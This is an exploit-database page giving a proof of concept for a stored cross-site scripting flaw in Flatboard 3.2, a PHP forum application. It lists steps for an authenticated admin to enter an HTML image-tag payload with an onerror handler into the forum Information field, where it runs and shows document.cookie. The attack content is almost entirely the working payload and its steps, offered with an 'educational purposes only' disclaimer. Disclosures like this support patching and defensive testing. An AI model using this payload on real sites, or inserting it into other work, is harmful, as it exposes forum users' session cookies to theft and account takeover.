Flatboard 3.2 stored crosssite scripting (xss) (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-06-26 | Type : webapps | Platform : php
This exploit / vulnerability Flatboard 3.2 stored crosssite scripting (xss) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2024-06-23
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://flatboard.org/
# Version: 3.2
# PoC:

1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
3-Save it , you will be payload will be executed